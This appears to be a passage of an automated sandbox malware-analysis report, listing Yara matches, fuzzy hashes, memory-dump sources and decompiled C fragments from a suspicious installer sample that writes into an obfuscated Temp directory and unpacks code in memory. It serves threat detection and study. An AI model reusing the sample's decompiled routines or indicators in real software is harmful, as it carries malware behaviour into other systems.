                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4l[|$FZ.*$H7I$K6ox$Zl}$[4PX$eEVC$rfx$,fB
                                                                                                                                                                            • API String ID: 0-3052161659
                                                                                                                                                                            • Opcode ID: 49440a99e2381d1890aa76fdb9662d9736566b34123760d17c32fb6d0d6139fd
                                                                                                                                                                            • Instruction ID: 6830bc8c334151d93a712d46fb84395f687c6742118cac42da0854efd3bdb4a1
                                                                                                                                                                            • Opcode Fuzzy Hash: 49440a99e2381d1890aa76fdb9662d9736566b34123760d17c32fb6d0d6139fd
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B128BB217CA681EF21CDF38ACDA47E678DF6C6526370D66FD483C6497F825A8830161
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: <bT2$zngi$}j|H$uVc
                                                                                                                                                                            • API String ID: 0-4162570179
                                                                                                                                                                            • Opcode ID: ad32b11aff1f9946b1bce67555e761088a39f64440789ad922da6ef295253cb4
                                                                                                                                                                            • Instruction ID: 9229c6e490cfaee7ff9460040f256e599e93b1e4704b8e4a9950e0ae9cd0835c
                                                                                                                                                                            • Opcode Fuzzy Hash: ad32b11aff1f9946b1bce67555e761088a39f64440789ad922da6ef295253cb4
                                                                                                                                                                            • Instruction Fuzzy Hash: 01B19B6217DE6D1FF20CEB389CCA9BA23CEF7866147E0815EE047C3557E576A8834192
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                            			E0040205E() {
                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                            				void* _t59;
                                                                                                                                                                            				intOrPtr* _t63;
                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                            				intOrPtr* _t65;
                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                            				intOrPtr* _t69;
                                                                                                                                                                            				intOrPtr* _t71;
                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                            				intOrPtr* _t75;
                                                                                                                                                                            				intOrPtr* _t78;
                                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                                            				intOrPtr* _t82;
                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                            				int _t87;
                                                                                                                                                                            				intOrPtr* _t95;
                                                                                                                                                                            				signed int _t105;
                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                            				void* _t111;
                                                                                                                                                                            
                                                                                                                                                                            				 *(_t111 - 0x34) = E00402A3A(0xfffffff0);
                                                                                                                                                                            				 *(_t111 - 0xc) = E00402A3A(0xffffffdf);
                                                                                                                                                                            				 *((intOrPtr*)(_t111 - 0x4c)) = E00402A3A(2);
                                                                                                                                                                            				 *((intOrPtr*)(_t111 - 0x40)) = E00402A3A(0xffffffcd);
                                                                                                                                                                            				 *((intOrPtr*)(_t111 - 0x38)) = E00402A3A(0x45);
                                                                                                                                                                            				_t55 =  *(_t111 - 0x18);
                                                                                                                                                                            				 *(_t111 - 0x44) = _t55 & 0x00000fff;
                                                                                                                                                                            				_t105 = _t55 & 0x00008000;
                                                                                                                                                                            				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                                                                                                                            				 *(_t111 - 0x3c) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                            				if(E004057D8( *(_t111 - 0xc)) == 0) {
                                                                                                                                                                            					E00402A3A(0x21);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t59 = _t111 + 8;
                                                                                                                                                                            				__imp__CoCreateInstance(0x407408, _t87, 1, 0x4073f8, _t59);
                                                                                                                                                                            				if(_t59 < _t87) {
                                                                                                                                                                            					L15:
                                                                                                                                                                            					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                                                                                                                            					_push(0xfffffff0);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                            					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x407418, _t111 - 0x30);
                                                                                                                                                                            					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                                                                                                                            					if(_t64 >= _t87) {
                                                                                                                                                                            						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                            						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                                                                                                                            						if(_t105 == _t87) {
                                                                                                                                                                            							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                            							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical\\Micala\\aarhundredeskiftet\\Dichroitic30\\Climaxed");
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t109 != _t87) {
                                                                                                                                                                            							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                            							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                            						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x3c));
                                                                                                                                                                            						_t95 =  *((intOrPtr*)(_t111 - 0x40));
                                                                                                                                                                            						if( *_t95 != _t87) {
                                                                                                                                                                            							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                            							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x44));
                                                                                                                                                                            						}
                                                                                                                                                                            						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                            						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x4c)));
                                                                                                                                                                            						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                            						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x38)));
                                                                                                                                                                            						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                                                            							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                                                                                                                            							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x34), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                                                                                                                            								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                                                                            								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                                                                            						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                            					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                            					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                                                            						_push(0xfffffff4);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				E00401423();
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t111 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}






















                                                                                                                                                                            0x00402067
                                                                                                                                                                            0x00402071
                                                                                                                                                                            0x0040207b
                                                                                                                                                                            0x00402085
                                                                                                                                                                            0x00402090
                                                                                                                                                                            0x00402093
                                                                                                                                                                            0x004020ad
                                                                                                                                                                            0x004020b0
                                                                                                                                                                            0x004020b6
                                                                                                                                                                            0x004020b9
                                                                                                                                                                            0x004020c3
                                                                                                                                                                            0x004020c7
                                                                                                                                                                            0x004020c7
                                                                                                                                                                            0x004020cc
                                                                                                                                                                            0x004020dd
                                                                                                                                                                            0x004020e5
                                                                                                                                                                            0x004021bb
                                                                                                                                                                            0x004021bb
                                                                                                                                                                            0x004021c2
                                                                                                                                                                            0x004020eb
                                                                                                                                                                            0x004020eb
                                                                                                                                                                            0x004020fa
                                                                                                                                                                            0x004020fe
                                                                                                                                                                            0x00402101
                                                                                                                                                                            0x00402107
                                                                                                                                                                            0x00402115
                                                                                                                                                                            0x00402118
                                                                                                                                                                            0x0040211a
                                                                                                                                                                            0x00402125
                                                                                                                                                                            0x00402125
                                                                                                                                                                            0x0040212a
                                                                                                                                                                            0x0040212c
                                                                                                                                                                            0x00402133
                                                                                                                                                                            0x00402133
                                                                                                                                                                            0x00402136
                                                                                                                                                                            0x0040213f
                                                                                                                                                                            0x00402142
                                                                                                                                                                            0x00402147
                                                                                                                                                                            0x00402149
                                                                                                                                                                            0x00402153
                                                                                                                                                                            0x00402153
                                                                                                                                                                            0x00402156
                                                                                                                                                                            0x0040215f
                                                                                                                                                                            0x00402162
                                                                                                                                                                            0x0040216b
                                                                                                                                                                            0x00402171
                                                                                                                                                                            0x00402178
                                                                                                                                                                            0x00402191
                                                                                                                                                                            0x00402193
                                                                                                                                                                            0x004021a1
                                                                                                                                                                            0x004021a1
                                                                                                                                                                            0x00402191
                                                                                                                                                                            0x004021a4
                                                                                                                                                                            0x004021aa
                                                                                                                                                                            0x004021aa
                                                                                                                                                                            0x004021ad
                                                                                                                                                                            0x004021b3
                                                                                                                                                                            0x004021b9
                                                                                                                                                                            0x004021ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004021b9
                                                                                                                                                                            0x004021c4
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed, xrefs: 0040211D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed
                                                                                                                                                                            • API String ID: 123533781-3529700753
                                                                                                                                                                            • Opcode ID: 72b7c8b7d08c9ab9c84fa976ac8820b50ccab597134c12820353a887da7c1cc5
                                                                                                                                                                            • Instruction ID: 15b8319daa3a69dadbe16bc3493db081a7dc62ee607a685d27ecc12527328b4b
                                                                                                                                                                            • Opcode Fuzzy Hash: 72b7c8b7d08c9ab9c84fa976ac8820b50ccab597134c12820353a887da7c1cc5
                                                                                                                                                                            • Instruction Fuzzy Hash: 785138B1A00208BFCF10DFA4C988A9D7BB5FF48319F20856AF515EB2D1DB799941CB54
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                                                                                            • String ID: :kb$VB\J$KVi
                                                                                                                                                                            • API String ID: 2706961497-3305211729
                                                                                                                                                                            • Opcode ID: 16b257904164f09001bab376b034b6d122b24f237a62f373473185394b89d787
                                                                                                                                                                            • Instruction ID: 320df12702b834bc504a53c16b59b0a3fef5fb0db894c400e2df3d053ebca6b6
                                                                                                                                                                            • Opcode Fuzzy Hash: 16b257904164f09001bab376b034b6d122b24f237a62f373473185394b89d787
                                                                                                                                                                            • Instruction Fuzzy Hash: 7452F5315043868FDB35DF388DE87DA7BE2AF52360F5982AACC998F196D3348546C712
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: "5RS$d
                                                                                                                                                                            • API String ID: 0-1296392734
                                                                                                                                                                            • Opcode ID: d24ee21fca59111e612dfae3c2848b8a27abc2b1fa5734532a0d30e17c886e4c
                                                                                                                                                                            • Instruction ID: 9867740e15c4e073e059270bf700f1193d4c87fdf3c46a250599cefbfe59b67d
                                                                                                                                                                            • Opcode Fuzzy Hash: d24ee21fca59111e612dfae3c2848b8a27abc2b1fa5734532a0d30e17c886e4c
                                                                                                                                                                            • Instruction Fuzzy Hash: B5E16835E05306CFDF356E349A963D63B63EF52350F6540AACC869B266C77049839BC2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 39%
                                                                                                                                                                            			E00402688(char __ebx, char* __edi, char* __esi) {
                                                                                                                                                                            				void* _t19;
                                                                                                                                                                            
                                                                                                                                                                            				if(FindFirstFileA(E00402A3A(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                                                                                                                            					E00405C57(__edi, _t6);
                                                                                                                                                                            					_push(_t19 - 0x178);
                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                            					E00405CF9();
                                                                                                                                                                            				} else {
                                                                                                                                                                            					 *__edi = __ebx;
                                                                                                                                                                            					 *__esi = __ebx;
                                                                                                                                                                            					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}




                                                                                                                                                                            0x004026a0
                                                                                                                                                                            0x004026b4
                                                                                                                                                                            0x004026bf
                                                                                                                                                                            0x004026c0
                                                                                                                                                                            0x004027f5
                                                                                                                                                                            0x004026a2
                                                                                                                                                                            0x004026a2
                                                                                                                                                                            0x004026a4
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                            • Opcode ID: cb16f76f613cfeacfe9d7d1606de7c41d9ddcb675c05edb315b0dfd0efe91f96
                                                                                                                                                                            • Instruction ID: a95b2630499809d01a6e7b037cab792d100f7a465f9f887e4e98b5ff960ae470
                                                                                                                                                                            • Opcode Fuzzy Hash: cb16f76f613cfeacfe9d7d1606de7c41d9ddcb675c05edb315b0dfd0efe91f96
                                                                                                                                                                            • Instruction Fuzzy Hash: 79F0A7726082009BE701E7A49949AEE7778DB61314F60057BE241A21C1D7B84985AB3A
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ov]
                                                                                                                                                                            • API String ID: 0-114068628
                                                                                                                                                                            • Opcode ID: 084da0a0eabcd494e1f6e801dbbb0eeca226ca737ec895eeedf78a8d6bcd9a7e
                                                                                                                                                                            • Instruction ID: cbc188775bf1c9eae9167667b1aea831d7e78ace725035289244075e2042381a
                                                                                                                                                                            • Opcode Fuzzy Hash: 084da0a0eabcd494e1f6e801dbbb0eeca226ca737ec895eeedf78a8d6bcd9a7e
                                                                                                                                                                            • Instruction Fuzzy Hash: 6B6154357103068FDF789E7848F43EA23D7AF81350F99823BDC968B695E72598C9C642
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ov]
                                                                                                                                                                            • API String ID: 0-114068628
                                                                                                                                                                            • Opcode ID: cd855a8ea7fff4d222b3e9e12e68d5ea68d52194584b36b43625b72361b70bd9
                                                                                                                                                                            • Instruction ID: 1ff8ece0daed2c2098b080c552f740dc7894553a6af30bed2b8a53c8ee0ba204
                                                                                                                                                                            • Opcode Fuzzy Hash: cd855a8ea7fff4d222b3e9e12e68d5ea68d52194584b36b43625b72361b70bd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A510320F053038BCF389A3459E53D6B7875F81288764C57ACC925B6AADB71D88797C3
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: QNGx
                                                                                                                                                                            • API String ID: 0-3373742045
                                                                                                                                                                            • Opcode ID: 480af2d4ce81a6aac255bdafb43a35d25b8c3f8020f18d93aa73582c4c73c8dc
                                                                                                                                                                            • Instruction ID: f8d66063dacebbe5be55cec89bfea7118f3fa98b7b7116825e02307d901370e4
                                                                                                                                                                            • Opcode Fuzzy Hash: 480af2d4ce81a6aac255bdafb43a35d25b8c3f8020f18d93aa73582c4c73c8dc
                                                                                                                                                                            • Instruction Fuzzy Hash: B9419A35A007568BCF30CE3889E07D737D2AF13760F9E422EDE929F294C72499818B41
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `
                                                                                                                                                                            • API String ID: 0-1850852036
                                                                                                                                                                            • Opcode ID: 02ef2902f4911396a91b7c3dadb3eeaf71f45c38137d2dabf98c3de55f8b3196
                                                                                                                                                                            • Instruction ID: 92a1919cb4f17068022c80307f05cf5347ec63e0c674322ce3e82d51710f17ba
                                                                                                                                                                            • Opcode Fuzzy Hash: 02ef2902f4911396a91b7c3dadb3eeaf71f45c38137d2dabf98c3de55f8b3196
                                                                                                                                                                            • Instruction Fuzzy Hash: BC41AE72A043968EEF34CE398D983EE2BE2AF82360F59431FDC569B595D77081428A41
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 82f20e2d0bdc3ebef4f304c2754a2f25b5b48a390e26b7336af3f4384f841dce
                                                                                                                                                                            • Instruction ID: 1ef4cf0e40baa95d82bcadfbb9045771e71c53fef913fb18bd725bd4e8adb8f3
                                                                                                                                                                            • Opcode Fuzzy Hash: 82f20e2d0bdc3ebef4f304c2754a2f25b5b48a390e26b7336af3f4384f841dce
                                                                                                                                                                            • Instruction Fuzzy Hash: F9619966E6F73288E7C3A07089D07A74E49DF6B181F118F6A8C67E1D607B1F858E0195
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0656d82cd60f8f8ebf8a09b6aa3e826b545b53eec8263ac43baf455589850346
                                                                                                                                                                            • Instruction ID: cc8e586a56feedd446131d5cef88dead57a150c2237497f1e811a90296b52719
                                                                                                                                                                            • Opcode Fuzzy Hash: 0656d82cd60f8f8ebf8a09b6aa3e826b545b53eec8263ac43baf455589850346
                                                                                                                                                                            • Instruction Fuzzy Hash: 01C12431F093468FCB34AE3499557DB7BA3AF85390F658429DCC4AB219CB70898787C2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 46d5341e68fdc26f908198b0bca0397785f252bed49fa7dd6d377262f54f0cbb
                                                                                                                                                                            • Instruction ID: 914b6342822c56c3e73f9dba0d6a2c745f9610a0379b43f9a6ee0eb9ec581496
                                                                                                                                                                            • Opcode Fuzzy Hash: 46d5341e68fdc26f908198b0bca0397785f252bed49fa7dd6d377262f54f0cbb
                                                                                                                                                                            • Instruction Fuzzy Hash: 50B11920F0E357CBCB25A67495863D6FF53AF8235472889A9CCD05F66BCB60884793C2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ad7d769390df36509d5cb33b345584639cfa631ac78b40f0021d107b12e1be1f
                                                                                                                                                                            • Instruction ID: 18a8d0a4e3d72907e99ae9893278873475ac6851b4b1f3ac3d7f83fb365b5cdf
                                                                                                                                                                            • Opcode Fuzzy Hash: ad7d769390df36509d5cb33b345584639cfa631ac78b40f0021d107b12e1be1f
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E71AC66E6F73284E7C3A07089D07A74E49DF6B181F11CF6A8C67E1D60771F858E0195
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 542c34aaa45744057178dbbf63454308cabfb463439c8eb90460166be03884b2
                                                                                                                                                                            • Instruction ID: 9d6d27c1cb3a76612c3378f3b9c0644140905217315fa532ad15a7b708a3cc76
                                                                                                                                                                            • Opcode Fuzzy Hash: 542c34aaa45744057178dbbf63454308cabfb463439c8eb90460166be03884b2
                                                                                                                                                                            • Instruction Fuzzy Hash: AA518966E6F73284E7C3A07089D47AB4E49DF5B181F118F6A8C67E1DA07B1F858E0285
                                                                                                                                                                            Uniqueness

